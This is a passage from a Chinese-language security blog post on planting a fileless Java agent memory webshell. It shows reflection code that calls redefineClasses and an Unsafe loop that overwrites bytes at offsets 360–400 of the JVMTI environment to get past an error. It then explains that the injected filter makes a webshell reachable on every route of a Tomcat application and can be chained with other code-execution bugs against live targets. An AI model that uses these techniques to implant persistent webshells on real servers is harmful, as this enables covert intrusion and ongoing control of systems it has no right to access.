class="string">&quot;redefineClasses&quot;</span>, ClassDefinition[].class);</span><br><span class="line">            redefineClasses_method.invoke(insn,<span class="keyword">new</span> <span class="title class_">Object</span>[]&#123;<span class="keyword">new</span> <span class="title class_">ClassDefinition</span>[]&#123;classDefinition&#125;&#125;);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">catch</span> (Exception e)&#123;</span><br><span class="line">    e.printStackTrace();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="解决报错"><a href="#解决报错" class="headerlink" title="解决报错"></a>解决报错</h2><p>redefinsCLasses时报错。</p>
<p>逆一下libjvm.so，（没找到这个函数的源码<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/3c03b0a4ad3d5eb1c05e92f83e620504.png"></p>
<p>这里的this就是jvmtienv指针，在361偏移上，需要为2<br>不同版本的偏移可能会不同，直接在360-400上全写为2，本地测试没有问题<br>（<strong>如果真实环境下，要谨慎操作，只写在361偏移上，或者有理论依据，保证写在某个范围上不会有影响，否则把其他指针覆盖了，程序会直接崩溃。<br>这里不好说，我不懂。<br>稳妥一点的话，先看jdk版本，本地测试该版本的偏移，或者从目标环境把libjvm.so拉下来逆向确定偏移，再打内存马</strong>）</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> (<span class="type">int</span> i=<span class="number">360</span>;i&lt;<span class="number">400</span>;i++)&#123;</span><br><span class="line">     unsafe.putByte(env+i,(<span class="type">byte</span>) <span class="number">2</span>);</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>

<h2 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h2><p>将注入shell的代码放在<code>/agent</code>下，访问agent路由，会注册一个webshell到ApplicationFilterChain的doFilter下，此时访问任意路由，都可以触发写入的webshell<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/9033539a22f43d92a54cc96c3609d900.png"><br>结合其他代码执行的漏洞，可无需上传jar包，直接注入agent内存马，</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/about/">关于</a></li>
        
          <li><a href="/archives/">归档</a></li>
        
          <li><a href="/tags/">标签</a></li>
        
          <li><a target="_blank" rel="noopener" href="http://github.com/yaoyao-cool">项目</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JVM%E6%80%8E%E4%B9%88%E5%88%9B%E5%BB%BA-JPLISAgent"><span class="toc-number">2.</span> <span class="toc-text">JVM怎么创建_JPLISAgent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E4%BB%BB%E6%84%8FNative%E6%96%B9%E6%B3%95"><span class="toc-number">3.</span> <span class="toc-text">调用任意Native方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0shellcode"><span class="toc-number">4.</span> <span class="toc-text">构造shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E6%9E%90elf"><span class="toc-number">5.</span> <span class="toc-text">解析elf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A1%AB%E5%85%85shellcode%EF%BC%8C%E5%86%99%E5%85%A5%E5%86%85%E5%AD%98"><span class="toc-number">6.</span> <span class="toc-text">填充shellcode，写入内存</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0JPLISAgent"><span class="toc-number">7.</span> <span class="toc-text">伪造JPLISAgent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5webshell"><span class="toc-number">8.</span> <span class="toc-text">注入webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E6%8A%A5%E9%94%99"><span class="toc-number">9.</span> <span class="toc-text">解决报错</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95"><span class="toc-number">10.</span> <span class="toc-text">测试</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&text=无文件agent内存马"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=无文件agent内存马"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=无文件agent内存马&body=Check out this article: http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&name=无文件agent内存马&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&t=无文件agent内存马"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2016-2025
    yy
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/yaoyao-cool">项目</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
